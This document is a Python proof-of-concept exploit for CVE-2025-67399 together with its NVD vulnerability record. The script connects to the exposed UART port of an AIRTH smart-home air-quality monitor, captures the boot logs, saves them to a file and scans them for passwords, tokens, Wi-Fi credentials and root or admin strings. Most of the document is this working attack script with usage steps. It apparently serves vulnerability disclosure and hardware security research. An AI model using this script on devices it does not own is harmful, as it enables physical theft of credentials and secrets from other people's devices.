CVE-2025-67399

#!/usr/bin/env python3 """ CVE-2025-67399 PoC - AIRTH AQI MONITOR UART Information Disclosure Author: Security Researcher Description: This PoC demonstrates how to extract sensitive information from AIRTH AQI MONITOR device via exposed UART port. """ import serial import time import sys def connect_uart(port='/dev/ttyUSB0', baudrate=115200): """Connect to the device UART port""" try: ser = serial.Serial( port=port, baudrate=baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=5 ) return ser except serial.SerialException as e: print(f"[-] Failed to connect to {port}: {e}") return None def extract_uart_output(serial_conn, output_file='uart_dump.txt', duration=10): """Extract UART output for specified duration""" print(f"[*] Starting UART capture for {duration} seconds...") print(f"[*] Collecting boot logs and sensitive information...\n") start_time = time.time() collected_data = [] try: while time.time() - start_time < duration: if serial_conn.in_waiting: data = serial_conn.read(serial_conn.in_waiting) decoded_data = data.decode('utf-8', errors='ignore') collected_data.append(decoded_data) print(decoded_data, end='', flush=True) time.sleep(0.1) except KeyboardInterrupt: print("\n[!] Capture interrupted by user") # Save collected data with open(output_file, 'w', encoding='utf-8') as f: f.write(''.join(collected_data)) print(f"\n[+] Data saved to {output_file}") return collected_data def analyze_collected_data(data): """Analyze collected data for sensitive information""" sensitive_keywords = [ 'password', 'key', 'token', 'secret', 'wifi', 'ssid', 'api', 'credential', 'auth', 'login', 'root', 'admin', 'bootloader', 'firmware', 'version', 'build' ] findings = [] combined_data = ''.join(data).lower() print("\n[*] Analyzing collected data for sensitive information...") for keyword in sensitive_keywords: if keyword in combined_data: findings.append(f"[!!!] Found potential sensitive data: '{keyword}'") if findings: print("\n" + "="*60) print("SECURITY FINDINGS:") print("="*60) for finding in findings: print(finding) else: print("[*] No obvious sensitive keywords found in the output") return findings def main(): print("="*60) print("CVE-2025-67399 PoC - AIRTH AQI MONITOR UART Exploitation") print("="*60) print("Target: AIRTH SMART HOME AQI MONITOR") print("Vulnerable Component: Bootloader v.1.005 on BK7231N") print("="*60 + "\n") # Configuration - adjust these based on your setup uart_port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0' baud_rate = 115200 # Common for BK7231N, may also be 921600 capture_duration = 15 # seconds # Step 1: Connect to UART print(f"[*] Connecting to UART at {uart_port}@{baud_rate}...") ser = connect_uart(uart_port, baud_rate) if ser is None: print("[!] Please specify correct serial port") print("Usage: python3 poc.py /dev/ttyUSB0") sys.exit(1) print("[+] Connected successfully!\n") # Step 2: Capture UART output during device boot print("[!] Power on the device now if not already powered...") time.sleep(2) data = extract_uart_output(ser, 'uart_dump.txt', capture_duration) # Step 3: Analyze for sensitive information analyze_collected_data(data) # Cleanup ser.close() print("\n[*] UART session closed. Check uart_dump.txt for full output.") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-67399", "sourceIdentifier": "[email protected]", "published": "2026-01-14T16:15:56.610", "lastModified": "2026-02-12T17:54:40.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in AIRTH SMART HOME AQI MONITOR Bootloader v.1.005 allows a physically proximate attacker to obtain sensitive information via the UART port of the BK7231N controller (Wi-Fi and BLE module) on the device is open to access"}, {"lang": "es", "value": "Un problema en el Bootloader v.1.005 de AIRTH SMART HOME AQI MONITOR permite a un atacante físicamente próximo obtener información sensible a través del puerto UART del controlador BK7231N (módulo Wi-Fi y BLE), que en el dispositivo está abierto al acceso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airth:smart_home_aqi_monitor_bootloader:1.005:*:*:*:*:*:*:*", "matchCriteriaId": "C9D00FAD-24F7-472F-AF47-009F0010BFA4"}]}]}], "references": [{"url": "http://airth.com", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://github.com/rupeshsurve04/CVE-2025-67399/blob/main/AIRTH_SMART_HOME_AQI_MONITOR_CVE-2025-67399.pdf", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}